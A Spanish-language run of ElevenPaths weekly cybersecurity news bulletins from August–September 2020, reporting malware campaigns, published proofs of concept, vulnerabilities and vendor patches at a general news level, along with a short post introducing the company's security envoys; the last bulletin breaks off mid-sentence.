https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/firefox-android-2020 Aumento de actividad del malware LokiBot La Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) de Estados Unidos ha alertado tanto a instituciones gubernamentales como al sector privado sobre un incremento en la actividad del software malicioso LokiBot. Dicho aumento de detecciones relacionadas con este malware comenzó a darse a partir del pasado mes de julio, en campañas en las que se utiliza LokiBot por sus funcionalidades como: exfiltrar credenciales, obtención de datos, keylogger, captura de pantalla. Asimismo, dispone de la capacidad de funcionar como puerta trasera, lo que permite a agentes amenaza ejecutar otro tipo de software malicioso. El vector de entrada suele ser el compromiso mediante el envío de correos electrónicos, ejecutables maliciosos o a través de archivos torrent. Desde CISA advierten a usuarios y/o administradores de sistemas que tomen las correspondientes medidas paliativas propuestas por el organismo con el fin de minimizar los riesgos ante una posible infección. Más: https://us-cert.cisa.gov/ncas/alerts/aa20-266a Alien, malware heredero de Cerberus Investigadores de Threat Fabric han identificado un nuevo malware cercano a Cerberus como responsable de las últimas campañas llevadas a cabo este año y que se habían atribuido a este malware. Alien, que es como se ha denominado a este troyano bancario que ataca dispositivos Android, tiene una capacidad avanzada para eludir las medidas de seguridad de doble factor de autenticación para robar credenciales. De acuerdo con la investigación llevada a cabo, Alien sería capaz de robar contraseñas de 226 aplicaciones móviles entre las que se encuentran las de bancos españoles como BBVA, Bankia, UnicajaMovil o Kutxabank, entre otros, así como de otras aplicaciones como Telegram, Netflix, Intagram o Twitter. De acuerdo a la investigación llevada a cabo, el principal país objetivo estaría siendo España, seguido de Turquía, Alemania, EE.UU., Italia y Francia. Asimismo, se espera que en lo que queda de año continúen apareciendo variantes de malware basadas en Cerberus, tal y como ha ocurrido con Alien. Más: https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
25 de septiembre de 2020
Presentamos a los nuevos Chief Security Envoys (CSEs) de ElevenPaths para 2020
Desde hace varios años, en ElevenPaths contamos con la figura de los CSAs (Chief Security Ambassadors). Se trata de expertos en ciberseguridad, embajadores de nuestra marca alrededor del mundo cuya misión es promocionar la cultura de la seguridad a través de conferencias y artículos. El año pasado, y con el objetivo de ampliar el alcance de estos embajadores, creamos una nueva figura: los ElevenPaths CSE (Chief Security Envoy), un programa de reconocimiento de profesionales del sector de la ciberseguridad. Tras una primera experiencia que fue todo un éxito, hoy os queremos presentar a las dos nuevas incorporaciones de este programa: Juan Carlos Fernández Martínez y David Sánchez Jiménez. Juan Carlos Fernández Martínez Trabajador de la Administración, abogado y creador del despacho TECNOGADOS. Compagina dichas actividades con la de profesor especialista en temas legales relacionados con las nuevas tecnologías y la ciberseguridad en varios Máster (UCLM, EOI o Escuela de Seguridad Ciudadana de Toledo). Además, ha participado en las famosas charlas TED, así como los principales Congresos de Seguridad Informática en España, como RootedCON, Navaja Negra, MoretureloCON y en las XIII Jornadas STIC CCN-CERT del Centro Nacional Criptológico. Perfiles sociales: Twitter LinkedIn MyPublicInbox David Sánchez Jiménez Experto en Ciberseguridad en The Security Sentinel. Docente experto en Hacking Ético y Seguridad Ofensiva del Master en Dirección de Ciberseguridad, Hacking Ético y Seguridad Ofensiva de la Escuela Internacional de Posgrados (EIP). Perfiles sociales: LinkedIn Si quieres conocer al resto de CSEs que repiten convocatoria en España, puedes consultar el artículo del año pasado, y en Ecuador, donde repiten Alicia y Christian. A continuación, os dejamos una serie de artículos escritos por nuestros CSEs que hemos publicado en este mismo blog durante los últimos meses. Amador Aparicio de la Fuente Análisis de APPs relacionadas con COVID19 usando Tacyt (I) Análisis de APPs relacionadas con COVID19 usando Tacyt (II) Juan Francisco Bolivar Hernández Verificación en dos pasos en WhatsApp, ¿seguridad o engaño? Claudio Chifa Recuperación de datos y borrado seguro Antonio Fernandes Vázquez Antonio Gil Moyano Andres David Naranjo Venegas ElevenPaths Radio 2×13 – Entrevista a Josep Albors y Andrés Naranjo Análisis de APPs relacionadas con COVID19 usando Tacyt (I) Análisis de APPs relacionadas con COVID19 usando Tacyt (II) Teletrabajo seguro, aplicando ciberseguridad desde casa Decálogo de recomendaciones sobre la ciberamenaza iraní Un resumen de Melilla SecureTIC 2020 Cuando el phishing encontró el breach replay Ransomware: el azote de las Pymes Carlos Rodriguez Morales Blockchain y ciberseguridad: una breve aproximación (I) Blockchain y ciberseguridad: la inmutabilidad (II) Blockchain y ciberseguridad (III): la descentralización como solución Pilar Vila Avendaño ElevenPaths Radio – 1×13 Entrevista a Pilar Vila Para los organizadores de eventos, charlas y conferencias que quieran contar con alguno de estos expertos en los mismos, ponemos a su disposición una dirección de correo. cse@11paths.com en el que esperamos sus solicitudes. ¡Estaremos encantados de acudir a compartir conocimiento!
23 de septiembre de 2020
Noticias de Ciberseguridad: Boletín semanal 12-18 de septiembre
PoC para vulnerabilidad crítica en Netlogon Investigadores de Secura han publicado una herramienta que permite comprobar si un controlador de dominio es vulnerable a la vulnerabilidad CVE-2020-1472, en Netlogon. El mes pasado, Microsoft parcheaba esta vulnerabilidad crítica, con CVSS 10, en Netlogon Remote Protocol (MS-NRPC) que permitiría a un atacante, no autenticado, elevar privilegios y pasar a ser el Domain Admin de un controlador de dominio (DC) vulnerable. En ese momento, investigadores de seguridad como Kevin Beaumont apuntaban a la necesidad de parchear. Hace unos días, el 11 de septiembre, se publicó ya un script que trata de evadir la autenticación de Netlogon. Este script finaliza cuando tenga éxito o tras varios intentos fallidos. Se recomienda instalar el parche que mitiga este error lo antes posible. Información completa: https://www.secura.com/blog/zero-logon Exploit para vulnerabilidad en Microsoft Exchange El pasado viernes, un investigador independiente publicaba en fuentes abiertas una prueba de concepto válida para la vulnerabilidad CVE-2020-16875 en servidores de correo Microsoft Exchange que permitiría la ejecución remota de código. Esta vulnerabilidad, cuya explotación permitiría la autopropagación (capacidades de "gusano"), fue subsanada por Microsoft la semana pasada en su boletín mensual de actualizaciones de septiembre. En un primer momento, el fabricante la consideró de riesgo crítico (CVSSv3 de 9.1, que decreció hasta 8.4 al desvelarse la necesidad de autenticación) y con poca probabilidad de ser explotada. No obstante, la aparición de este PoC contradice esta última estimación. Como factor mitigante, para poder llevar a cabo el aprovechamiento, el atacante habría de comprometer un usuario de Exchange con el rol "Data Loss Prevention". Los productos afectados son Microsoft Exchange Server 2016 y 2019. Se recomienda actualizar lo antes posible. Más detalles: https://twitter.com/steventseeley/status/1304095793809371137 Campaña del troyano URSA contra múltiples países Desde el pasado mes de junio, una nueva campaña de infecciones con el troyano URSA, también conocido como Mispadu, está afectando a usuarios en múltiples países, incluidos Bolivia, Chile, México, Argentina, Ecuador, Colombia, Paraguay, Costa Rica, Brasil, España, Italia y Portugal. URSA es un malware relativamente reciente y cuyo objetivo es el robo de credenciales bancarias a través de navegadores, software de uso generalizado como FTP, servicios de email, y también a través de la superposición de falsos portales bancarios en los que la víctima introduciría sus credenciales bancarias. Este troyano se distribuye a través de campañas de phishing o malspam suplantando a diversas entidades. Por ejemplo, en Portugal ha suplantado recientemente a Vodafone, EDP (Energias de Portugal), MEO (Serviços de Comunicações e Multimédia, S.A) y Policía Judiciaria. Durante esta actividad, URSA ha impactado a 3.379 usuarios, según los datos obtenidos de algunos servidores Command & Control identificados en esta oleada de ataques, aunque es posible que el número de infecciones haya sido mucho mayor. El país con mayor afectación ha sido México (1.977 infecciones), seguido de España (631), Portugal (514) y Chile (331). Toda la información: https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/ Liberado código fuente malware Cerberus Un investigador de seguridad informó sobre la filtración del código fuente de la versión 2 del malware Cerberus, troyano bancario dirigido contra dispositivos móviles que utilizan el sistema operativo Android. Este software malicioso de acceso remoto (RAT) cuenta entre sus funcionalidades con: interceptación de comunicaciones, manipulación de la funcionalidad del dispositivo, exfiltración de datos y credenciales bancarias y lectura de mensajes de texto que pueden contener códigos de acceso de un solo uso (OTP) y códigos de autenticación de doble factor (2FA) - evitando así esta medida de seguridad. En lo que respecta a la filtración del código, el pasado mes de julio se informaba que el gestor de la herramienta habría revelado que el equipo de desarrollo se estaba desintegrando, por lo que buscaba un nuevo propietario mediante la creación de una subasta del código fuente. A falta de compradores, se ha producido la filtración del mismo. Según se indica, tras la liberación del código fuente de Cerberus, se ha producido un aumento en infecciones de aplicaciones móviles en Europa y Rusia, país que anteriormente no había sido afectado por esta amenaza. Vulnerabilidades en el core de Drupal Se han publicado cinco vulnerabilidades cross-site scripting (XSS), de omisión de autenticación y de divulgación de información en el core de Drupal, una de severidad alta y el resto de severidad media. La vulnerabilidad más grave alta es la de tipo XSS reflejado, y podría permitir que un atacante aprovechara la forma en que se representa código HTML para los formularios afectados. Se ha reservado el identificador CVE-2020-13668 para esta vulnerabilidad. Para el resto de errores con menor criticidad se han reservado los identificadores: CVE-2020-13666, CVE-2020-13667, CVE-2020-13669 y CVE-2020-13670. Además, hay que resaltar que las versiones de Drupal 8 anteriores a 8.8.x están al final de su vida útil y ya no reciben cobertura de seguridad. Los portales en versiones 8.7.x o anterior deberán actualizarse a 8.8.10. Más: https://www.incibe-cert.es/alerta-temprana/avisos-seguridad/vulnerabilidades-el-core-drupal-1 Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
18 de septiembre de 2020
Noticias de Ciberseguridad: Boletín semanal 5-11 de septiembre
Boletín de actualizaciones de Microsoft Microsoft publicó el martes su boletín de actualizaciones correspondiente al mes de septiembre. En este nuevo boletín se han corregido un total de 129 vulnerabilidades en 15 de sus productos, de las cuales 23 son consideradas de severidad crítica, 105 como importantes y 1 como severa. De entre las vulnerabilidades críticas, destacan 11 que permitirían la ejecución remota de código en Windows (CVE-2020-1252), en Microsoft SharePoint (CVE-2020-1200 / 1210 / 1452 / 1453 / 1576 / 1595) y Microsoft SharePoint Server (CVE-2020-1460), así como en Microsoft Dynamics 365 (CVE-2020-16857, CVE-2020-16862) y Microsoft Exchange (CVE-2020-16875). Para esta última vulnerabilidad, podrían existir exploits según afirman algunos usuarios. Se recomienda instalar los últimos parches de Microsoft a la mayor brevedad posible. Más info: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Sep Campaña de Emotet en Francia La Agencia Nacional de Seguridad de los Sistemas de Información de Francia (ANSSI) publicó el lunes una alerta advirtiendo del incremento de la actividad de Emotet en Francia. Tras su vuelta a la actividad en julio, después de una ausencia de cinco meses, Emotet se ha distribuido en campañas de phishing por todo el mundo, si bien en los últimos días la ANSSI ha observado cómo estas campañas tenían una especial atención en empresas y la administración pública francesa. En la alerta se emiten una serie de recomendaciones y medios de detección de Emotet, debido al riesgo añadido que conlleva este malware, el cual una vez descargado instala otros troyanos como TrickBot o QakBot. La advertencia de las autoridades francesas se suma a las ya emitidas por agencias de Nueva Zelanda o Japón sobre este mismo malware. Todos los detalles: https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/ Nueva suplantación de la Agencia Tributaria para distribuir malware El Instituto Nacional de Ciberseguridad (INCIBE) ha alertado de una nueva campaña de distribución de malware mediante correos electrónicos suplantando a la Agencia Tributaria (AEAT). Los correos, distribuidos este martes, se envían bajo el asunto “AEAT – Aviso de Notificación (números aleatorios)”. En estos se informa al usuario acerca de una supuesta denuncia presentada contra su empresa por una factura no declarada, e informando de que en los próximos 3 días un representante de la Agencia Tributaria se pondrá en contacto para planificar una reunión. Los correos incitan a la víctima a abrir el archivo Excel adjunto (con contraseña AEAT) donde se supone puede encontrar más información de la denuncia. Al abrir este archivo, se solicita la activación del mismo, momento en el que se descarga el troyano que contiene. Más info: https://www.incibe.es/protege-tu-empresa/avisos-seguridad/campana-distribucion-malware-traves-email-suplanta-aeat Ciberataques con afectación en las elecciones presidenciales de EE.UU Microsoft ha detectado en las últimas semanas una nueva oleada de ciberataques que tienen como objetivo las elecciones presidenciales de EE.UU. Estos ataques provienen de grupos extranjeros como Stronium, Zirconium y Phosphorus. En relación a Stronium (Rusia), desde el Microsoft Threat Intelligence Center (MSTIC) se les ha vinculado con patrón recién descubierto de robo de credenciales de Office365 dirigido a organizaciones de Estados Unidos y Reino Unido que participan directamente en las elecciones. La recolección de credenciales es una conocida técnica utilizada por Strontium para permitir futuras operaciones de vigilancia o de intrusión. Su actividad se habría estado monitorizando desde abril de 2020 y, en esta ocasión, el grupo ha utilizado herramientas de fuerza bruta y password sprayingpara la recolección. Entre septiembre de 2019 y junio de 2020, STRONTIUM lanzó ataques de recolección de credenciales contra miles de cuentas en más de 200 organizaciones. En las dos semanas comprendidas entre el 18 de agosto y el 3 de septiembre, los mismos ataques se dirigieron a 6.912 cuentas pertenecientes a 28 organizaciones. Ninguna de estas cuentas fue comprometida con éxito. Atendiendo a Zirconium (China), sus ataques se han focalizado en personas destacadas de la comunidad de asuntos internacionales, así como en personas relacionadas con la campaña y los candidatos, habiendo logrado casi 150 compromisos de correos electrónicos. Finalmente, Phosphorus (Irán) ha tratado de acceder a cuentas personales y de trabajo de personas involucradas directa e indirectamente con las elecciones. Toda la información: https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
11 de septiembre de 2020
Noticias de Ciberseguridad: Boletín semanal 29 de agosto - 4 de septiembre
Amanecer Rojo, nuevo documento adjunto de Emotet En la última semana se ha descubierto el uso de una nueva plantilla de documento adjunto por parte de Emotet. Red Dawn (Amanecer Rojo) es el nombre que el investigador de seguridad Joseph Roosen ha dado a este archivo malicioso de Word (.doc) adjunto en los correos electrónicos de campañas de spam. Al abrirlo, se indica que el documento está protegido y por tanto la vista previa no está disponible, por lo que es necesario “habilitar edición” y “habilitar contenido” para verlo. Si la víctima realiza estos pasos anteriores, se ejecutan las macros maliciosas que descargan e instalan Emotet en el sistema. Con anterioridad, durante este verano, Emotet ha estado haciendo uso de una plantilla similar en la que indicaba que el documento había sido creado en iOS siendo necesario “habilitar edición” y “habilitar contenido” para verlo. Cabe recordar la importancia de detectar estos correos electrónicos de Emotet, debido a que es la puerta de entrada a troyanos como TrickBot y QBot, y estos, a su vez, de ransomware como Conti o ProLock. Para saber más: https://www.bleepingcomputer.com/news/security/emotet-malwares-new-red-dawn-attachment-is-just-as-dangerous/ Vulnerabilidad en EMV, protocolo de comunicación de tarjetas bancarias Investigadores han descubierto la forma de eludir la autenticación con código PIN en las transacciones sin contacto de tarjetas bancarias Visa. Se trata de un fallo protocolo EMV, concretamente en el método de verificación de la tarjeta bancaria que carece de protección criptográfica, lo cual permite que un agente amenaza pueda llevar a cabo un ataque del tipo Man-In-The-Middle (MITM). Los investigadores habrían demostrado mediante una prueba de concepto, basada en una aplicación Android llamada Tamarin, que se puede eludir el PIN en el proceso de pago debido a que el dispositivo no requiere introducir el código al creer que se ha realizado la autenticación por parte del consumidor. La prueba de concepto, llevada a cabo en tiendas y otros locales, fue un éxito a la hora de eludir la introducción del PIN en las tarjetas Visa Credit, Visa Electron y VPay. Todos los detalles: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/121618_2006.08249.pdf Epic Manchego: ofuscación en la distribución de maldocs Investigadores de NVISO han descubierto nuevas técnicas de ofuscación de maldocs que eluden la detección por parte de algunos sistemas de seguridad. Se trata de documentos Excel maliciosos que distribuyen malware a través de código VBA, con la peculiaridad de que se crean sin usar Microsoft Office. Un análisis de los investigadores ha revelado su creación a través de herramientas como EPPlus, un software para generar documentos con una biblioteca .NET que crea hojas de cálculo Office Open XML (OOXML). Con esta técnica se obtienen archivos con código VBA no compilado, característica que puede brindar únicamente Office, y que se entrega en texto plano sin cifrar, pero sí protegido por contraseña, la cual no necesita ser introducida para que se ejecuten las macros. Una vez ejecutadas, se obtiene un payload que inicia una segunda fase de infección, identificado por algunos fabricantes de antivirus como Agente Tesla. Tras la carga dinámica de un DLL, como tercera fase del ataque se descarga un infostealer que exfiltra datos sensibles del equipo de la víctima. Más: https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/ ISPs europeos sufren ataques DDoS Más de una docena de proveedores de servicios de Internet (ISP) en Europa han informado de ataques DDoS dirigidos a su infraestructura de DNS. La lista de ISPs que sufrieron ataques durante la semana pasada incluye a la operadora belga Edpnet, las francesas Bouygues Telecom, FDN, K-net, SFR y las holandesas Caiway, Delta, FreedomNet, Online.nl, Signet y Tweak.nl. Los ataques no duraron más de un día y todos fueron eventualmente mitigados, pero los servicios de ISP estuvieron caídos mientras el DDoS estaba activo. NBIP, una organización sin ánimo de lucro fundada por ISP holandeses para combatir colectivamente los ataques DDoS y los intentos de escuchas telefónicas del gobierno, ha proporcionado información adicional sobre los incidentes de la semana pasada indicando que "varios ataques iban dirigidos a routers e infraestructura de DNS de los ISP con sede en Benelux". Además desde NBIP señalan que "la mayoría de los ataques fueron de amplificación de DNS y ataques de tipo LDAP". "Algunos de los ataques tardaron más de 4 horas y alcanzaron un volumen cercano a los 300 Gbit / s". Más info: https://www.zdnet.com/article/european-isps-report-mysterious-wave-of-ddos-attacks/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
4 de septiembre de 2020
Noticias de Ciberseguridad: Boletín semanal 22-28 de agosto
El ransomware Conti se distribuye tras Trickbot Conti es un ransomware aparecido por primera vez en ataques aislados en diciembre de 2019 pero que comenzó a ser una amenaza patente en junio de 2020 al incrementar de forma notable sus ataques contra objetivos corporativos. Este ransomware se rige por el modelo de Ransomware-as-a-Service, donde una serie de afiliados realizan los ataques y disponen de una parte de los beneficios obtenidos. Siguiendo además las tendencias actuales en este tipo de amenazas, se trata de un ransomware operado manualmente que extorsiona a sus víctimas amenazando con la publicación de los archivos robados en sus intrusiones (actualmente se cuentan 26 empresas incluidas en su web). Conti es considerado el heredero del ransomware Ryuk, cuya actividad comenzó a declinar hasta desaparecer por completo en julio, ya que ahora también ha adoptado los métodos de distribución de éste, posicionándose como payload final en los compromisos llevados a cabo por el malware Trickbot. Más información: https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/ Nuevas campañas de troyanos Grandoreiro y Mekotio en España En los últimos días se están detectando diversas campañas de correos electrónicos que distribuyen los troyanos bancarios de origen brasileño Grandoreiro y Mekotio en España. Por un lado, Grandoreiro está haciendo uso de la misma plantilla de correo ya utilizada en campañas anteriores, donde suplanta a la Agencia Tributaria con el fin de que la víctima descargue un fichero alojado en dominios recientemente creados. Además, este malware también está suplantando a la empresa Vodafone como parte de esta campaña. En cuanto al troyano Mekotio, cabe destacar que también está suplantando a la Agencia Tributaria así como al Ministerio de Trabajo, siendo destacable que el enlace de descarga del malware apunta a una dirección alojada en la nube de Microsoft Azure. Que estas campañas se estén centrando en España es indicador del éxito que estaría teniendo entre víctimas del país, por lo que se recomienda revisar los correos electrónicos que se reciben, no abrir ficheros ni acceder a enlaces, y siempre acudir a la página web oficial de la empresa u organismo en cuestión suplantado. Noticia completa: https://blogs.protegerse.com/2020/08/25/oleadas-de-correos-propagan-los-troyanos-bancarios-grandoreiro-y-mekotio-en-espana/ SunCrypt nuevo miembro del cártel de Maze SunCrypt es el último ransomware que se ha unido al cártel de ransomwares formado por Maze, LockBit y Ragnar Locker. De acuerdo a los gestores de SunCrypt, estos se habrían unido al cártel debido a que Maze “no podría estar manejando todo el campo de operaciones disponibles”. De esta forma Maze estaría compartiendo su infraestructura de ataques a cambio de un beneficio económico compartido en caso de que las operaciones de compromiso resulten exitosas. Atendiendo al ransomware SunCrypt, se sabe que comenzó a operar en octubre de 2019 y que se distribuye como una DLL. Al ejecutarse, cifra los archivos del sistema agregando un hash hexadecimal al final de cada archivo y creando una nota de rescate que contiene un enlace al sitio de pago de Tor, así como al sitio web de filtración de datos de SunCrypt. Es destacable que al ejecutarse el ransomware, este se conecta a una IP para transmitir información de la víctima y el ataque, siendo esta IP una de las utilizadas por Maze en sus operaciones. Más detalles: https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel Nueva campaña de Qbot para robar hilos de correos Investigadores de Check Point han publicado un informe en el que informan que el troyano Qbot, también conocido como QakBot, estaría robando de nuevo hilos de correos electrónicos para su futuro uso en campañas de phishing y distribución de malware. Qbot es un troyano bancario que lleva más de 10 años infectando a víctimas y exfiltrando de sus equipos contraseñas, cookies, tarjetas de crédito, credenciales bancarias y correos electrónicos. Los hilos robados se aprovechan para campañas de phishing y malspam, siendo estas muy efectivas ya que resultan más creíbles al incluir correos maliciosos entre la conversación de un hilo de correos ya conocido por los usuarios. Los investigadores destacan una de las características agregadas a Qbot, que consiste en la capacidad de ensamblar el malware a partir de dos mitades, evitando de esta forma la detección cuando se descarga en el equipo víctima. Más información: https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
28 de agosto de 2020
Noticias de Ciberseguridad: Boletín semanal 15-21 de agosto
EmoCrash: la vacuna que ralentizó 6 meses de ataques con Emotet La vuelta a la actividad del popular malware Emotet ha desvelado que la ausencia de ataques durante casi 6 meses podría deberse al descubrimiento de un investigador y analista de malware de Binary Defense, James Quinn, que habría detectado una vulnerabilidad en este malware a principios del año 2020. Según el analista, este habría detectado una variación en los mecanismos de persistencia de Emotet, que ahora crea claves de registro de Windows donde guarda claves de cifrado XOR. Este descubrimiento y otros relacionados llevo a Quinn a poder desarrollar una “vacuna” en forma de una script PowerShell que hace que la clave de registro provoque un desbordamiento de búfer en Emotet, siendo por tanto bautizada como EmoCrash. Durante los últimos seis meses, EmoCrash se distribuyó en secreto a través de varios CERTs hasta que los desarrolladores de Emotet cambiaron de nuevo el mecanismo de persistencia y reemprendieron su actividad maliciosa a gran escala a principios de agosto. Más información: https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/ PoC para vulnerabilidad RCE en Apache Struts 2 Investigadores de seguridad han hecho pública una prueba de concepto que puede ser utilizada para explotar la vulnerabilidad de ejecución remota de código (CVE-2019-0230) en Apache Struts 2, publicada el jueves 13 de agosto. Este fallo se debe a un error en la evaluación de los atributos de las etiquetas cuando se utilizan entradas no validadas que permiten inyectar expresiones OGNL maliciosas. Algunas versiones de Struts incorporan controles para mitigar estos ataques, pero solo tras la versión 2.5.22. Es posible mitigar la vulnerabilidad con una validación adecuada de la entrada del usuario o si no se hace uso de la sintaxis para entrada de usuario modificable. Aunque el objetivo de la PoC publicada sea la vulnerabilidad CVE-2019-0230, desde Apache recomiendan corregir también el fallo CVE-2019-0233, que permitiría realizara ataques DoS al servidor vulnerable. Todos los detalles en: https://github.com/PrinceFPF/CVE-2019-0230/blob/master/CVE-2019-0230.sh Vulnerabilidad crítica en servidor de Jenkins Los desarrolladores de Jenkins, software de servidores de automatización de código abierto, publicaron el lunes un comunicado sobre una vulnerabilidad crítica en el servidor web Jetty que podría resultar en una corrupción de memoria y provocar que se divulgue información confidencial. Catalogada como CVE-2019-17638, el fallo tiene una calificación CVSS3.1 de 9.4 e impacta en las versiones 9.4.27.v20200227 a 9.4.29.v20200521 de Eclipse Jetty, una herramienta con todas las funciones que proporciona un servidor HTTP Java y un contenedor web para su uso en entornos de software. La vulnerabilidad puede permitir que atacantes no autenticados obtengan encabezados de respuesta HTTP que pueden incluir datos confidenciales destinados a otro usuario, según la empresa. Tras descubrir este problema, los desarrolladores corrigieron el fallo en la versión Jetty 9.4.30.v20200611, publicada el mes pasado. Jenkins, que incluye Jetty a través de una interfaz de línea de comandos llamada Winstone, corrigió el fallo en la herramienta en Jenkins 2.243 y Jenkins LTS 2.235.5 publicados el lunes. Se recomienda que los usuarios de Jenkins actualicen su software a la última versión para mitigar el error de corrupción del búfer. Noticia completa: https://www.jenkins.io/security/advisory/2020-08-17/ Error de software en cajeros automáticos En los últimos días se ha conocido la detención de más de 50 sospechosos acusados de robar en cajeros automáticos del Banco Santander explotando un error de software. La realización de estos robos se ha circunscrito a varias ciudades de Estados Unidos, donde varios grupos de criminales utilizaron tarjetas válidas y falsas de crédito y débito precargadas para retirar más dinero del que estaba almacenado en estas tarjetas. Inicialmente este error del software permaneció en secreto, si bien acabó compartiéndose en varias redes sociales. Esto propició la explotación del error por parte de más grupos criminales y provocó un aumento repentino de retirada de efectivo en cajeros automáticos que hizo que saltaran las alarmas y se realizara una investigación. El martes de esta semana, todos los cajeros automáticos fueron desactivados para evitar más robos, y en el día de ayer se abrieron de momento sólo para clientes del banco. A raíz de conocerse la noticia, los dos principales fabricantes de cajeros automáticos, Diebold Nixdorf y NCR, han lanzado actualizaciones de software para corregir estos errores. Por un lado, Diebold Nixdorf ha parcheado la vulnerabilidad CVE-2020-9062, la cual afectaba a cajeros automáticos ProCash 2100xe USB ATMs con software Wincor Probase, mientras que NCR ha parcheado la vulnerabilidad CVE-2020-10124 con afectación en cajeros SelfServ con software APTRA XFS. Ambas vulnerabilidades permitían a un atacante interceptar y modificar mensajes relativos a la cantidad de dinero o valor de la moneda depositada, debido a que los cajeros no cifran ni autentican la integridad de los mensajes entre el cajero y el ordenador central. De esta forma, en un proceso de dos pasos, un atacante podía depositar una suma de dinero, modificando los mensajes en cuanto a la cantidad de este o el valor de la moneda, y posteriormente realizar la extracción del dinero con el valor o cantidad introducido en el mensaje. Ambas compañías han implementado ya actualizaciones del software para proteger las comunicaciones entre el cajero y el ordenador central. Más información: https://www.zdnet.com/article/tens-of-suspects-arrested-for-cashing-out-santander-atms-using-software-glitch/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
21 de agosto de 2020
Noticias de Ciberseguridad: Boletín semanal 8-14 de agosto
Intentos de explotación de una vulnerabilidad crítica en F5 Big-IP ADC El FBI ha emitido una notificación donde advierte a la industria privada que, desde principios de julio de 2020, un grupo vinculado a Irán habría estado tratando de comprometer dispositivos ADC de Big-IP vulnerables al fallo de seguridad de ejecución remota de código sin autenticación CVE-2020-5902 (CVSSv3 de 9.8). Los ataques habrían sido dirigidos a organizaciones estadounidenses de una amplia gama de sectores. En la nota se alerta a la industria privada que si sus redes se ven comprometidas por este grupo, el parcheo de los dispositivos sería una técnica de mitigación insuficiente puesto que acostumbran a utilizar web shells para obtener puertas traseras persistentes y robar credenciales para recuperar el acceso. Tras lograr el acceso a la red, emplearían herramientas como Mimikatz o NMAP para realizar un reconocimiento de la red interna y agregar nuevos usuarios a los sistemas. El mes pasado, la CISA (Cybersecurity and Infrastructure Security Agency) también emitía una advertencia confirmando la explotación activa de esta vulnerabilidad y la afectación de dos organizaciones comprometidas a través de la explotación de este fallo. Por otra parte, estos mismos actores también estarían vinculados a múltiples campañas contra dispositivos VPN vulnerables desde agosto de 2019 aprovechando fallos de seguridad en Pulse Secure (CVE 2019-11510, CVE 2019-11539) y Citrix ADC/Gateway (CVE 2019-19781). Noticia completa: https://www.bleepingcomputer.com/news/security/fbi-iranian-hackers-trying-to-exploit-critical-f5-big-ip-flaw/ Bypass para vulnerabilidad 0-Day en vBulletin El investigador de seguridad Amir Etemadieh, ha publicado un bypass para un parche que corregía una vulnerabilidad 0-Day en vBulletin. Este es uno de los software de foros más utilizados de la actualidad y el pasado septiembre de 2019 se detectaba la existencia de una vulnerabilidad de 0-Day, con identificador CVE-2019-16759 y con un CVSS de 9.8. El fallo permitía a los atacantes aprovechar un error en el sistema de plantilla de vBulletin para ejecutar código malicioso y apoderarse de los foros sin necesidad de autenticarse en los sitios de las víctimas. Los detalles y el código de explotación se encuentran disponibles en el blog de Etemadieh junto a tres PoC en Bash, Python y Ruby. A Las pocas horas de conocerse la información el foro de la Def Con era víctima de este ataque. Más detalles en: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ Microsoft corrige 120 vulnerabilidades Microsoft ha lanzado sus actualizaciones correspondientes al mes agosto de 2020. En esta ocasión la compañía ha parcheado 120 vulnerabilidades que afectan a 13 productos diferentes. Entre las 120 vulnerabilidades, 17 fallos se han calificado como críticos. Dos de estos fallos críticos se corresponden con dos 0-day para los que se confirma la detección de explotación previa por parte de agentes amenaza. CVE-2020-1380: Se trata de una vulnerabilidad de corrupción de memoria del motor de secuencias de comandos que afecta a Internet Explorer y que permite a los agentes amenaza la ejecución remota de código. CVE-2020-1464: Es una vulnerabilidad de suplantación de Windows que permite a actores maliciosos realizar suplantaciones al permitir firmar digitalmente un ejecutable. Esto les permitiría 